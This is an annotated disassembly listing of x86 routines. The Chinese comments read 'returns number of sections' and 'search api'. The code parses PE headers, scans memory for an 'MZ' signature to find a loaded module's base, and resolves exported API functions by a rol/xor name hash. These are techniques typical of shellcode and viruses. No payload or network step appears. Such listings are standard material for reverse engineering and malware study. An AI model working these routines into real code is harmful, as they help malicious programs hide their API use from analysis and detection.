.text:00401200 mov eax, [esp+arg_0]
.text:00401204 add eax, [eax+3Ch]
.text:00401207 mov edx, [eax+28h]
.text:0040120A add edx, [eax+34h]
.text:0040120D xchg eax, edx
.text:0040120E retn 4
.text:0040120E sub_401200 endp
.text:0040120E
.text:00401211
.text:00401211 ; =============== S U B R O U T I N E =======================================
.text:00401211
.text:00401211
.text:00401211 sub_401211 proc near ; CODE XREF: sub_4010F9+54p返回节的个数
.text:00401211
.text:00401211 arg_0 = dword ptr 4
.text:00401211
.text:00401211 mov eax, [esp+arg_0]
.text:00401215 add eax, [eax+3Ch]
.text:00401218 movzx ecx, word ptr [eax+6]
.text:0040121C retn 4
.text:0040121C sub_401211 endp
.text:0040121C
.text:0040121F
.text:0040121F ; =============== S U B R O U T I N E =======================================
.text:0040121F
.text:0040121F
.text:0040121F sub_40121F proc near ; CODE XREF: sub_401091+1p
.text:0040121F push esi
.text:00401220 xor esi, esi
.text:00401222 mov esi, fs:[esi+18h]
.text:00401226 lodsd
.text:00401227 lodsd
.text:00401228 mov eax, [eax-1Ch]
.text:0040122B
.text:0040122B loc_40122B: ; CODE XREF: sub_40121F+15j
.text:0040122B dec eax
.text:0040122C xor ax, ax
.text:0040122F cmp word ptr [eax], 5A4Dh
.text:00401234 jnz short loc_40122B
.text:00401236 pop esi
.text:00401237 retn
.text:00401237 sub_40121F endp
.text:00401237
.text:00401238
.text:00401238 ; =============== S U B R O U T I N E =======================================
.text:00401238
.text:00401238
.text:00401238 sub_401238 proc near ; CODE XREF: sub_401091+8p 搜索api
.text:00401238 ; sub_401091+1Fp
.text:00401238
.text:00401238 var_24 = dword ptr -24h
.text:00401238 arg_0 = dword ptr 4
.text:00401238 arg_4 = dword ptr 8
.text:00401238
.text:00401238 pusha
.text:00401239 mov ebx, [esp+20h+arg_0]
.text:0040123D mov edx, [ebx+3Ch]
.text:00401240 mov esi, [ebx+edx+78h]
.text:00401244 lea esi, [esi+ebx+18h]
.text:00401248 lodsd
.text:00401249 xchg eax, ecx
.text:0040124A lodsd
.text:0040124B add eax, ebx
.text:0040124D xchg eax, ebp
.text:0040124E lodsd
.text:0040124F add eax, ebx
.text:00401251 xchg eax, edx
.text:00401252 lodsd
.text:00401253 add eax, ebx
.text:00401255 push eax
.text:00401256 mov esi, edx
.text:00401258
.text:00401258 loc_401258: ; CODE XREF: sub_401238:loc_40128Bj
.text:00401258 lodsd
.text:00401259 add eax, ebx
.text:0040125B xor edx, edx
.text:0040125D
.text:0040125D loc_40125D: ; CODE XREF: sub_401238+2Ej
.text:0040125D rol edx, 3
.text:00401260 xor dl, [eax]
.text:00401262 inc eax
.text:00401263 cmp byte ptr [eax], 0
.text:00401266 jnz short loc_40125D
.text:00401268 mov eax, [esp+24h+var_24]
.text:0040126B add [esp+24h+var_24], 2
.text:0040126F mov edi, [esp+24h+arg_4]
.text:00401273
.text:00401273 loc_401273: ; CODE XREF: sub_401238+51j
.text:00401273 cmp [edi], edx
.text:00401275 jnz short loc_401284
.text:00401277 movzx eax, word ptr [eax]
.text:0040127A mov eax, [ebp+eax*4+0]
.text:0040127E add eax, ebx
.text:00401280 scasd
.text:00401281 stosd
.text:00401282 jmp short loc_40128B
.text:00401284 ; ---------------------------------------------------------------------------
.text:00401284
.text:00401284 loc_401284: ; CODE XREF: sub_401238+3Dj
.text:00401284 scasd
.text:00401285 scasd
.text:00401286 cmp dword ptr [edi], 0
.text:00401289 jnz short loc_401273
.text:0040128B
.text:0040128B loc_40128B: ; CODE XREF: sub_401238+4Aj
.text:0040128B loop loc_401258
.text:0040128D pop ecx
.text:0040128E popa
.text:0040128F retn 8
.text:0040128F sub_401238 endp
.text:0040128F
.text:0040128F ; ---------------------------------------------------------------------------
.text:00401292 align 200h
.text:00401292 _text ends
.text:00401292
.text:00401292
.text:00401292 end start
